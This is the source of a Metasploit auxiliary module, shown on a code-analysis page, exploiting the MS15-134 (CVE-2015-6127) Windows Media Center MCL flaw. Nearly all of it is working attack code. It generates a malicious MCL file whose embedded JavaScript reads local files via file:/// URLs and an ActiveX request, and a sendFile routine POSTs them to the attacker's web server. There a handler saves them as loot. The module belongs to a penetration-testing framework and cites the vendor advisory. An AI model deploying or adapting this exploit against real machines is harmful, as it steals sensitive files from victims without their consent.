Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
modules/auxiliary/server/ms15_134_mcl_leak.rb

Summary

Maintainability
A
1 hr
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'cgi'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
      'Description'    => %q{
        This module exploits a vulnerability found in Windows Media Center. It allows an MCL
        file to render itself as an HTML document in the local machine zone by Internet Explorer,
        which can be used to leak files on the target machine.

        Please be aware that if this exploit is used against a patched Windows, it can cause the
        computer to be very slow or unresponsive (100% CPU). It seems to be related to how the
        exploit uses the URL attribute in order to render itself as an HTML file.
      },
      'Author'         =>
        [
          'Francisco Falcon', # Vuln discovery & PoCs & Detailed write-ups & awesomeness
          'sinn3r'
        ],
      'References'     =>
        [
          ['CVE', '2015-6127'],
          ['MSB', 'MS15-134'],
          ['URL', 'https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/'],
          ['URL', 'http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference']
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2015-12-08',
    ))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
        OptPath.new('FILES',      [true, 'Files you wish to download', ::File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files_win.txt')])
      ])
  end

  def receiver_page
    @receiver_page_name ||= Rex::Text.rand_text_alpha(5)
  end

  def js
    %Q|
function sendFile(fname, data) {
  var xmlHttp = new XMLHttpRequest();
  if (!xmlHttp) { return 0; }
  xmlHttp.open('POST', '#{get_uri}/#{receiver_page}', true);
  xmlHttp.setRequestHeader('Content-type', 'multipart/form-data');
  xmlHttp.setRequestHeader('Connection', 'close');
  var body = 'fname=' + encodeURIComponent(fname) + '&data=' + data.toString();
  xmlHttp.send(body);
}

function getFile(fname) {
  var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
  xmlHttp.open('GET', fname, false);
  xmlHttp.send();
  return xmlHttp.responseBody.toArray();
}

var files = [#{load_file_paths * ","}];

for (var i=0; i < files.length; i++) {
  try {
    var data = getFile('file:///' + files[i]);
    sendFile(files[i], data);
  } catch (e) {}
}

    |
  end

  def generate_mcl
    %Q|<application url="#{datastore['FILENAME']}">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE-edge">
</head>
<body>
<script type="text/javascript">
#{js}
</script>
</body>
</html>
</application>
    |
  end

  def load_file_paths
    @files ||= lambda {
      buf = ''
      ::File.open(datastore['FILES'], 'rb') do |f|
        buf = f.read
      end
      buf.split.map { |n| "\"#{n.gsub!(/\\/, '/')}\"" }
    }.call
  end

  def run
    exploit
  end

  def start_service(opts = {})
    super
    print_status("Generating #{datastore['FILENAME']}...")
    mcl = generate_mcl
    file_create(mcl)
    print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
    print_status("When the MCL is executed, it should start sending data (files) back")
    print_status("to our web server.")
  end

  def is_ie?(request)
    fp = fingerprint_user_agent(request.headers['User-Agent'])
    fp[:ua_name] == HttpClients::IE
  end

  def parse_data(data)
    buf = ''
    data.scan(/\d+/).each do |n|
      buf << n.to_i.chr
    end
    buf
  end

  def parse_body(body)
    params = CGI::parse(body)

    {
      fname: ::File.basename(params['fname'].first),
      data:  parse_data(params['data'].first)
    }
  end

  def on_request_uri(cli, request)
    unless is_ie?(request)
      print_error('Client is not Internet Explorer.')
      send_not_found(cli)
      return
    end

    unless /#{receiver_page}/i === request.uri
      print_error("Unknown request: #{request.uri}")
      send_not_found(cli)
      return
    end

    buff = ''

    print_status("Receiving data...")
    file = parse_body(request.body.to_s)
    p = store_loot('mcl.file', 'application/octet-stream', cli.peerhost, file[:data], file[:fname])
    print_good("#{file[:fname]} saved as: #{p}")

    # If you are kind of lazy to open the saved files, and just sort of want to see the data,
    # here you go (handy for debugging purposes, but against a larger network this is probably
    # too much info)
    vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}")

  end
end